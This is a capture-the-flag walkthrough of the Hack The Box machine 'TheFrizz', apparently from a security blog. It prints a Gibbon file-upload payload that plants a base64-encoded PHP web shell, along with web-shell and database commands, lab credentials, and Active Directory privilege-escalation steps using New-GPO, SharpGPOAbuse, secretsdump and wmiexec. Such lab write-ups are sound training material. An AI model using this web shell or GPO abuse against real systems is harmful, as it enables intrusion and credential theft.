LoginHack The Box: TheFrizz Machine Walkthrough β Medium Difficulity
Introduction to TheFrizz:
In this write-up, we will explore the βTheFrizzβ machine from Hack The Box, categorised as a medium difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
Objective on TheFrizz machine:
The goal of this walkthrough is to complete the βTheFrizzβ machine from Hack The Box by achieving the following objectives:
User Flag:
We began by exploiting a file upload vulnerability to gain a web shell on the target. From there, we located the config.php file, which contained database credentials. Using these, we accessed the database locally through mysql.exe, extracted a user hash, and successfully cracked it to obtain the password Jenni_Luvs_Magic23. With these credentials, we logged into the web application and discovered a message detailing an upcoming SSH migration, hinting at Kerberos-based authentication. We generated a Kerberos ticket (f.frizzle.ccache), leveraged it to gain SSH access to the system, and ultimately retrieved the user flag by executing type user.txt.
Root Flag:
After escalating privileges using M.SchoolBus and exploiting the SleepGPO via SharpGPOAbuse, we forced the Group Policy to update with gpupdate.exe /force. We then used secretdump to gather credentials and leveraged wmiexec to gain a root-level shell. From there, we accessed and read the root flag using the command type root.txt.
Enumerating the TheFrizz Machine
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
nmap -sC -sV -oA initial 10.10.11.60Nmap Output:
ββ[dark@parrot]β[~/Documents/htb/thefrizz]
ββββΌ $nmap -sC -sV -oA initial 10.10.11.60
# Nmap 7.94SVN scan initiated Thu Aug 21 20:57:38 2025 as: nmap -sC -sV -oA initial 10.10.11.60
Nmap scan report for 10.10.11.60
Host is up (0.16s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)Analysis:
- Port 22 (SSH): OpenSSH for_Windows_9.5 (protocol 2.0) for secure remote access
- Port 53 (DNS): Simple DNS Plus
- Port 80 (HTTP): Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12) web server, redirects to http://frizzdc.frizz.htb/home/
- Port 135 (MSRPC): Microsoft Windows RPC
- Port 139 (NetBIOS-SSN): Microsoft Windows NetBIOS session service
- Port 389 (LDAP): Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
- Port 445 (Microsoft-DS): Windows file sharing and Active Directory services
- Port 464 (kpasswd5): Kerberos password change service
- Port 593 (NCACN_HTTP): Microsoft Windows RPC over HTTP 1.0
- Port 3268 (LDAP): Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
Web Application Exploration on TheFrizz Machine:
This page offers no useful content; the only option available is a Staff Login link located in the upper right corner.
Clicking on the Staff Login redirects to a login page, but we currently do not have valid credentials to proceed with testing.
While examining the framework, I identified it as Gibbon v25.0.00 and found the following three relevant links through online research.
CVE-2023-34598: Local File Inclusion Vulnerability in Gibbon v25.0.0
Gibbon v25.0.0 is susceptible to a Local File Inclusion (LFI) vulnerability, allowing attackers to include and expose the contents of various files within the installation directory in the serverβs response. This flaw, identified as CVE-2023-34598, poses a significant risk by potentially revealing sensitive information stored in the affected files.
The proof-of-concept (PoC) for this can be found on GitHub here
However, this LFI is limited to reading non-PHP files, indicating certain restrictions. As shown in the screenshot, we attempted to read gibbon.sql. It appears to be included by default and contains nothing of interest.
Letβs proceed to test this directly on the website.
The page returns blank, which indicates a positive outcome.
Exploiting Web Vulnerabilities: Gaining a Reverse Shell with Burp Suite
It appears promising when viewed in Burp Suite.
We successfully uploaded dark.php to the website using the payload:
img=image/png;dark,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKT8%2b&path=dark.php&gibbonPersonID=0000000001Although any file type could be used, we tested specifically with dark.php.
We encountered an error upon execution.
The error displayed in the browser was similar to the one shown above.
We proceeded to test for command execution using the uploaded web shell by sending a request to dark.php with the parameter cmd=whoami (e.g., GET /path/to/dark.php?cmd=whoami or via curl http://target/dark.php?cmd=whoami). If successful, the response should display the current web user. If no output or an error is returned, we will try URL-encoding the command, using alternatives like id or uname -a, and verifying that cmd is the correct parameter used in the PHP payload.
We attempted to run a basic Windows reverse shell through the uploaded web shell, but it failed to execute and did not establish a connection.
Switching to a different reverse shell command/payload produced no response, but this outcome is still useful to note.
We successfully obtained a reverse shell connection back to our system.v
Burp Suite shows the connection assigned to the user w.webservice.
Two privileges are enabled, and one is disabled.
After gaining the shell, review the Gibbon configuration file and confirm that the current working directory is within the root of the entire site.
Database Credentials Extraction
In config.php, we found database credentials indicating an account connected to the database:
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';To avoid using port forwarding, we searched the machine for mysql.exe to interact with the database locally.
MySQL Database Enumeration on TheFrizz Machine
After some searching, we located mysql.exe on the machine.
Executing the SQL command above produced no output or effect.
Therefore, we modified the command to include SHOW DATABASES; to verify accessible databases.
We executed:
.\mysql.exe -u MrGibbonsDB -pMisterGibbs!Parrot!?1 --database=gibbon -e "SHOW TABLES;"The output listed several tables, including gibbonperson.
I then focused on the retrieved hash and attempted to crack it for possible credentials.
The extracted hashes, shown above, were used for the cracking attempt.
The cracking attempt failed due to Hashcatβs βseparator unmatchedβ error, indicating an unrecognized hash format.
The hash format likely needs to follow the example shown earlier, ensuring it matches the expected structure for Hashcat to process correctly.
Cracking the hash revealed the password Jenni_Luvs_Magic23.
Staff login enumeration
Since the web shell didnβt reveal anything useful, we proceeded to log in to the web application using the cracked credentials and began reviewing its contents.
The red option in the upper right corner caught my attention, and after clicking it, the Message Wall section appeared.
One of the messages stated: Reminder that TODAY is the migration date for our server access methods. Most workflows using PowerShell will not notice a difference (Enter-PSSession). If you encounter any issues, contact Fiona or Marvin between 8am and 4pm to have the pre-requisite SSH client installed on your Mac or Windows laptop.
Bloodhound enumeration on TheFrizz Machine
To analyse the environment with BloodHound, we used the command mentioned above.
The user F.frizzle belongs to Remote Management Users, Domain Users, and the Users group.
The user M.schoolbuss is a member of Desktop Admins and Group Policy Creator Owners.
The error βClock skew too greatβ indicates the password is valid, but the local system clock is out of sync, likely running behind the serverβs time.
Even after synchronising the time using ntpdate, the issue persisted, and the connection still failed.
Using the date command to manually adjust the time resulted in the same βClock skew too greatβ error.
Using faketime bypassed the clock skew issue, but the process now appears to be stuck when attempting to establish a session with evil-winrm.
[libdefaults]
default_realm = FRIZZ.HTB
dns_lookup_realm = true
dns_lookup_kdc = true
[realms]
FRIZZ.HTB = {
kdc = frizzdc.frizz.htb
admin_server = frizzdc.frizz.htb
}
[domain_realm]
.frizz.htb = FRIZZ.HTB
frizz.htb = FRIZZ.HTB
Updating the /etc/krb5.conf file also failed to resolve the issue, and the connection remains unsuccessful.
We successfully generated an f.frizzle.ccache Kerberos ticket.
SSH access to the target system was successfully obtained.
We obtained the user flag by executing the command type user.txt.
Escalate to Root Privileges Access
Privileges Access
An alternative faketime command also worked successfully, as demonstrated earlier.
While exploring the machine, we discovered a ChildItem within the Recycle.Bin folder.
We found two .7z archive files in the Recycle.Bin folder for further analysis.
Move the .7z files to the ProgramData directory to simplify access and analysis.
We were able to transfer files using the nc.cat command, as demonstrated earlier.
The file transfer eventually completes, though it may take a long timeβaround 2 hours in my case, though the duration may vary for others.
The wapt directory contains numerous files and folders.
I noticed a password that has been encoded using Base64.
As a result, I successfully uncovered a password: !suBcig@MehTed!R.
We can identify the potential user accounts as shown above.
We consolidated all the potential user accounts and credentials into a single file for easier reference.
Many users experienced KDC_ERR_PREAUTH_FAILED errors, but one user (frizz.htb\M.SchoolBus) with password !suBcig@MehTed!Rβreturned a KRB_AP_ERR_SKEW error.
As before, we executed the same command, but this time replaced F.Frizzle with M.SchoolBus.
Group Policy Exploitation
We created a new Group Policy Object and linked it with the command:
New-GPO -Name SleepGPO -Comment "Sleep is good" | New-GPLink -Target "DC=FRIZZ,DC=HTB" -LinkEnabled YesThe command creates a new Group Policy Object (GPO) named SleepGPO with a note saying βSleep is goodβ. A GPO is basically a set of rules or settings that can be applied to computers or users in a network. The command then links this GPO to the main network domain FRIZZ.HTB, making it active and enforcing the rules or settings defined in it.
We uploaded SharpGPOAbuse onto the victimβs machine to prepare for further Group Policy exploitation.
We used SharpGPOAbuse to elevate privileges by modifying the previously created GPO. The command
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName "SleepGPO"adds the user M.SchoolBus as a local administrator on targeted machines by leveraging the SleepGPO. Essentially, this allows M.SchoolBus to gain administrative rights across the network through the Group Policy.
The command gpupdate.exe /force is used to immediately apply updated Group Policy settings, ensuring that changes made by tools like SharpGPOAbuse take effect on target machines without waiting for the default refresh interval (typically 90 minutes). This forces a refresh of both user and computer policies, applying any new or modified Group Policy Objects (GPOs) instantly.
The command secretdump was executed to extract credential information from the target system, enabling further enumeration and exploitation.
We leveraged wmiexec to execute commands remotely and gain a root-level shell on the target system.
We obtained the root flag by accessing the root shell and executing type root.txt.
The post Hack The Box: TheFrizz Machine Walkthrough β Medium Difficulity appeared first on Threatninja.net.
